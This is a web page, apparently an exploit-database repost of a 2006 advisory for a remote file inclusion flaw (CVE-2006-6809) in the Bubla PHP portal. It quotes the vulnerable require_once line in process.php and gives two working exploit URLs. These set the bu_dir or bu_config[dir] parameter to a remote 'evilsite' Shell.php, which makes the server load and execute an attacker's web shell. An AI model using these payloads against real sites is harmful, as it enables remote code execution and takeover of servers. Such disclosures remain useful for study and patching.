[] NeoSense
E X P L O I T S
title author type platform port cve id

Bubla 1.0.0rc2 - '/bu/process.php' Remote File Inclusion

Author: DeltahackingTEAM
type: webapps
platform: php
port: 
date_added: 2006-12-26 
date_updated: 2016-09-21 
verified: 1 
codes: OSVDB-32541;CVE-2006-6809 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.combubla-1.0.0rc1.tar.gz
**********************************************************************************************************
                                              DeltasecurityTEAM
                                              WwW.Deltasecurity.iR
**********************************************************************************************************

* Portal Name = Bubla <= 1.0.0rc2

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Download = http://download.sourceforge.net/pub/sourceforge/b/bu/bubla/bubla-1.0.0rc1.tar.gz

* Discoverd By = DeltahackingTEAM

* User In Delta Team = Davood_Cracker

* Conatact = Davood_cracker@yahoo.com

* 128 Bit Security Server= www.takserver.ir

* Just Delta Hacking Security TEAM *
--------------------------------------------------------------------------------------------
Vulnerable code in process.php

require_once($bu_dir."/bu_l2.php");

--------------------------------------------------------------------------------------------

- Exploit:

1.0.0 RC1 http://localhost/[PATH]/bu/process.php?bu_dir=http://evilsite/Shell.php?
1.0.0 RC2 http://localhost/[PATH]/bu/process.php?bu_config[dir]=http://evilsite/Shell.php?

--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , Vpc

SP TNX : Dr.Pantagon

**********************************************************************************************************

# milw0rm.com [2006-12-27]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.